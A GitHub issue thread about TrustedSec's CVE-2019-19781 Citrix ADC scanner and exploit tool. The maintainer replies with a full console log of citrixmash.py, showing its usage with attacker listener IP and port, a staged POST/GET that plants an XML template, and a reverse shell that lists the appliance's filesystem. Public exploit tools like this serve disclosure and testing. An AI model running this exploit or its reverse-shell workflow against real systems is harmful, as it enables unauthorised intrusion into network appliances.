Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

The test results are not accurate #15

Closed
0xTract0r opened this issue Jan 14, 2020 · 2 comments
Closed

The test results are not accurate #15

0xTract0r opened this issue Jan 14, 2020 · 2 comments

Comments

@0xTract0r
Copy link

The result of cve-2019-19781_scanner.py is still vulnerable but citrixmash.py is not successful.I tried many

@trustedsec
Copy link
Collaborator

Are you running the latest versions of the scanner and exploit? I've been testing it on over 10,000 systems and have test cases up for every instance of ADC. Works as intended.

@trustedsec
Copy link
Collaborator

root@stronghold-nix:/home/relik/Desktop/git/cve-2019-19781# ./citrixmash.py 8889 8080

Citrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781
Company: TrustedSec, LLC
Tool Written by: Rob Simon and Dave Kennedy
Contributions: The TrustedSec Team
Website: https://www.trustedsec.com
INFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/

This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used
to append files in an XML format to the victim machine. This in turn allows for remote code execution.

Be sure to cleanup these two file locations:
/var/tmp/netscaler/portal/templates/
/netscaler/portal/templates/

IP Addresses and DNS names are usable in the victim address and attacker_listener fields (if host supports DNS).

Usage:

python3 citrixmash.py <attackerip_listener> <attacker_port>

[] Firing STAGE1 POST request to create the XML template exploit to disk...
[
] Saving filename as ychyhdqwwg.xml on the victim machine...
[] We got an expected response back for a vulnerable system. Initial stage exploit likely successful.
[
] Sleeping for 2 seconds to ensure file is written before we call it...
[] Triggering GET request for the newly created file with a listener waiting...
[
] Shell should now be in your listener... enjoy. Keep this window open..
[!] Be sure to cleanup the two locations here (artifacts): /var/tmp/netscaler/portal/templates/, /netscaler/portal/templates/
Connection from 42280 received!
sh: can't access tty; job control turned off
\u@ns$ ls
bin
colorful
compat
configdb
dev
etc
flash
home
lib
libexec
mnt
netscaler
nscache
nsconfig
optional
proc
root
sbin
tmp
usr
var
\u@ns$

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant